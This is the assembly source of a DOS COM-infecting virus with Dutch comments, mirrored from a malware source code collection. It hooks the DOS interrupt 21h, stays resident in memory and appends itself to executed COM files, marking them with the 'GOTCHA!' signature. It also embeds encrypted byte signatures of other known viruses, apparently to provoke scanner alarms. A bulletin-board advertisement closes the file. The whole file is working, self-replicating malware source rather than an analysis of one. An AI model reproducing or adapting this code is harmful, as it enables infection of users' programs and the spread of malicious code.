mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
398 lines
13 KiB
NASM
398 lines
13 KiB
NASM
;****************************************************************************
|
||
;* stripped COM-versie
|
||
;* met signature's
|
||
;*
|
||
;****************************************************************************
|
||
|
||
cseg segment
|
||
assume cs:cseg,ds:cseg,es:nothing
|
||
|
||
org 100h
|
||
|
||
SIGNLEN equ signend - signature
|
||
FILELEN equ eind - begin
|
||
RESPAR equ (FILELEN/16) + 17
|
||
BUFLEN equ 08h
|
||
VERSION equ 4
|
||
|
||
.RADIX 16
|
||
|
||
|
||
;****************************************************************************
|
||
;* Opstart programma
|
||
;****************************************************************************
|
||
|
||
begin: xor bx,bx
|
||
mov cl,07h
|
||
crloop: call crypt
|
||
loop crloop
|
||
call install
|
||
int 20
|
||
|
||
|
||
;****************************************************************************
|
||
;* Data
|
||
;****************************************************************************
|
||
|
||
buffer db BUFLEN dup (?)
|
||
oi21 dw ?,?
|
||
oldlen dw ?
|
||
handle dw ?
|
||
sign db 0
|
||
|
||
|
||
;****************************************************************************
|
||
;* Interupt handler 21
|
||
;****************************************************************************
|
||
|
||
ni21: pushf
|
||
|
||
cmp ax,4B00h
|
||
jne ni_verder
|
||
|
||
push es
|
||
push ds
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
|
||
call attach
|
||
|
||
mov cl,[sign]
|
||
call crypt
|
||
inc cl
|
||
and cl,07h
|
||
mov [sign],cl
|
||
call crypt
|
||
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
pop ds
|
||
pop es
|
||
|
||
exit: popf
|
||
jmp dword ptr cs:[oi21] ;naar oude int-handler
|
||
|
||
ni_verder: cmp ax,0DADAh
|
||
jne exit
|
||
mov ax,0A500h+VERSION
|
||
popf
|
||
iret
|
||
|
||
|
||
;****************************************************************************
|
||
;* plakt programma aan file (ASCIIZ DS:DX)
|
||
;****************************************************************************
|
||
|
||
attach: cld
|
||
|
||
mov ax,3D02h ;open de file
|
||
int 21
|
||
jc finnish
|
||
|
||
push cs
|
||
pop ds
|
||
mov [handle],ax ;bewaar file-handle
|
||
|
||
call eindptr ;bepaal lengte
|
||
jc finnish
|
||
mov [oldlen],ax
|
||
|
||
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
|
||
sbb dx,0
|
||
mov cx,dx
|
||
mov dx,ax
|
||
mov al,00h
|
||
call ptrmov
|
||
jc finnish
|
||
|
||
mov cx,SIGNLEN ;lees de laatse bytes
|
||
mov dx,offset buffer
|
||
call flread
|
||
jc finnish
|
||
|
||
verder3: push cs ;vergelijk signature met buffer
|
||
pop es
|
||
mov di,offset buffer
|
||
mov si,offset signature
|
||
mov cx,SIGNLEN
|
||
rep cmpsb
|
||
or cx,cx
|
||
jz finnish
|
||
|
||
call beginptr ;lees begin van file
|
||
mov cx,BUFLEN
|
||
mov dx,offset buffer
|
||
call flread
|
||
jc finnish
|
||
|
||
cmp word ptr [buffer],5A4Dh
|
||
jz finnish
|
||
|
||
call writeprog ;schrijf programma naar file
|
||
jc finnish
|
||
|
||
mov ax,[oldlen] ;bereken call-adres
|
||
add ax,offset entry
|
||
sub ax,0103
|
||
mov byte ptr [buffer],0E9h
|
||
mov word ptr [buffer+1],ax
|
||
|
||
call beginptr ;pas begin van file aan
|
||
mov cx,BUFLEN
|
||
mov dx,offset buffer
|
||
call flwrite
|
||
jc finnish
|
||
|
||
finnish: mov bx,[handle] ;sluit de file
|
||
mov ah,3Eh
|
||
int 21
|
||
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Crypt een signature
|
||
;****************************************************************************
|
||
|
||
crypt: push cx
|
||
mov al,14h
|
||
mul cl
|
||
add ax,offset virsig
|
||
mov si,ax
|
||
mov di,ax
|
||
push cs
|
||
push cs
|
||
pop ds
|
||
pop es
|
||
mov cx,0Ah
|
||
cryploop: lodsw
|
||
xor ax,0FFFFh
|
||
stosw
|
||
loop cryploop
|
||
pop cx
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Schrijf programma naar file
|
||
;****************************************************************************
|
||
|
||
writeprog: call eindptr
|
||
mov cx,FILELEN
|
||
mov dx,offset begin
|
||
call flwrite
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Subroutines voor file-pointer
|
||
;****************************************************************************
|
||
|
||
beginptr: mov al,00h ;naar begin van de file
|
||
xor cx,cx
|
||
xor dx,dx
|
||
jmp ptrmov
|
||
|
||
eindptr: mov al,02h ;naar eind van de file
|
||
xor cx,cx
|
||
xor dx,dx
|
||
; jmp ptrmov
|
||
|
||
ptrmov: mov ah,42h
|
||
mov bx,[handle]
|
||
int 21
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Subroutines voor lezen/schrijven
|
||
;****************************************************************************
|
||
|
||
flwrite: push cs
|
||
pop ds
|
||
mov ah,40h
|
||
mov bx,[handle]
|
||
int 21
|
||
ret
|
||
|
||
|
||
flread: push cs
|
||
pop ds
|
||
mov ah,3Fh
|
||
mov bx,[handle]
|
||
int 21
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Activering vanuit file
|
||
;****************************************************************************
|
||
|
||
entry: call entry2
|
||
entry2: pop bx
|
||
sub bx,offset entry2 ;CS:BX is begin programma - 100
|
||
|
||
cld
|
||
|
||
mov ax,bx ;copieer oude begin terug
|
||
add ax,offset buffer
|
||
mov si,ax
|
||
mov di,0100
|
||
mov cx,BUFLEN
|
||
rep movsb
|
||
|
||
mov ax,0100h
|
||
push ax
|
||
|
||
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
|
||
int 21h
|
||
cmp ah,0A5h
|
||
je entstop
|
||
|
||
call install ;installeer het programma
|
||
|
||
entstop: ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Installatie in het geheugen
|
||
;****************************************************************************
|
||
|
||
install: push ds
|
||
push es
|
||
|
||
xor ax,ax ;haal oude vector
|
||
mov es,ax
|
||
mov cx,word ptr es:0084h
|
||
mov dx,word ptr es:0086h
|
||
mov [bx+offset oi21],cx
|
||
mov [bx+offset oi21+2],dx
|
||
|
||
mov ax,ds ;pas geheugen-grootte aan
|
||
dec ax
|
||
mov es,ax
|
||
cmp byte ptr es:[0000h],5Ah
|
||
jnz cancel
|
||
mov ax,es:[0003h]
|
||
sub ax,RESPAR
|
||
jb cancel
|
||
mov es:[0003h],ax
|
||
sub es:[0012h], word ptr RESPAR
|
||
|
||
mov es,es:[0012h] ;copieer programma naar top
|
||
mov ax,bx
|
||
add ax,0100
|
||
mov si,ax
|
||
mov di,0100h
|
||
mov cx,FILELEN
|
||
rep movsb
|
||
|
||
mov dx,offset ni21 ;zet nieuwe vector
|
||
push es
|
||
pop ds
|
||
mov ax,2521h
|
||
int 21h
|
||
|
||
cancel: pop es
|
||
pop ds
|
||
|
||
ret
|
||
|
||
|
||
;****************************************************************************
|
||
;* Tekst en Signature
|
||
;****************************************************************************
|
||
|
||
virsig:
|
||
;SYSLOCK Virus
|
||
db 0D1h, 0E9h, 8Ah, 0E1h
|
||
db 8Ah, 0C1h, 33h, 06h
|
||
db 14h, 00h, 31h, 04h
|
||
db 46h, 46h, 0E2h, 0F2h
|
||
db 5Eh, 59h, 58h, 0C3h
|
||
;Sylvia Virus
|
||
db 8Dh, 36h, 03h, 01h
|
||
db 33h, 0C9h, 33h, 0C0h
|
||
db 0ACh, 3Ch, 1Ah, 74h
|
||
db 04h, 90h, 90h, 90h
|
||
db 90h, 90h, 90h, 90h
|
||
;DATACRIME IIb Virus
|
||
db 2Eh, 8Ah, 07h, 32h
|
||
db 0C2h, 0D0h, 0CAh, 2Eh
|
||
db 88h, 07h, 43h, 0E2h
|
||
db 0F3h, 90h, 90h, 90h
|
||
db 90h, 90h, 90h, 90h
|
||
;Yankee-Go-Home Virus (Enigma)
|
||
db 0D8h, 0Eh, 1Fh, 0BEh
|
||
db 37h, 08h, 81h, 0EEh
|
||
db 03h, 01h, 03h, 0F3h
|
||
db 89h, 04h, 0BEh, 39h
|
||
db 08h, 81h, 0EEh, 03h
|
||
;Slowdown Virus
|
||
db 0DEh, 90h, 90h, 81h
|
||
db 0C6h, 1Bh, 00h, 0B9h
|
||
db 90h, 06h, 2Eh, 80h
|
||
db 34h, 90h, 90h, 90h
|
||
db 90h, 90h, 90h, 90h
|
||
;Scotts Valley Virus
|
||
db 5Eh, 8Bh, 0DEh, 90h
|
||
db 90h, 81h, 0C6h, 32h
|
||
db 00h, 0B9h, 12h, 08h
|
||
db 2Eh, 90h, 90h, 90h
|
||
db 90h, 90h, 90h, 90h
|
||
;Tiny-2A related Virus
|
||
db 0A5h, 8Eh, 0C1h, 0A6h
|
||
db 74h, 12h, 4Eh, 4Fh
|
||
db 0F3h, 0A5h, 8Eh, 0C1h
|
||
db 93h, 91h, 91h, 26h
|
||
db 87h, 85h, 0E0h, 0FEh
|
||
;DATACRIME 1280 Virus
|
||
db 8Bh, 36h, 01h, 01h
|
||
db 83h, 0EEh, 03h, 8Bh
|
||
db 0C6h, 3Dh, 00h, 00h
|
||
db 75h, 03h, 0E9h, 02h
|
||
db 01h, 90h, 90h, 90h
|
||
|
||
|
||
;;July13 Virus
|
||
; db 0A0h, 12h, 00h, 34h
|
||
; db 90h, 0BEh, 12h, 00h
|
||
; db 0B9h, 0B1h, 04h, 2Eh
|
||
; db 30h, 04h, 46h, 0E2h
|
||
; db 0FAh, 90h, 90h, 90h
|
||
;;XA1 Virus (Tannenbaum)
|
||
;virsig: db 0FAh, 8Bh, 0ECh, 58h
|
||
; db 32h, 0C0h, 89h, 46h
|
||
; db 02h, 81h, 46h, 00h
|
||
; db 28h, 00h, 90h, 90h
|
||
; db 90h, 90h, 90h, 90h
|
||
;;Twelve Tricks Trojan Dropper
|
||
; db 0BEh, 64h, 02h, 31h
|
||
; db 94h, 42h, 01h, 0D1h
|
||
; db 0C2h, 4Eh, 79h, 0F7h
|
||
; db 90h, 90h, 90h, 90h
|
||
; db 90h, 90h, 90h, 90h
|
||
|
||
|
||
|
||
signature: db 'GOTCHA!',0
|
||
signend:
|
||
|
||
eind:
|
||
|
||
cseg ends
|
||
end begin
|
||
|
||
|
||
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|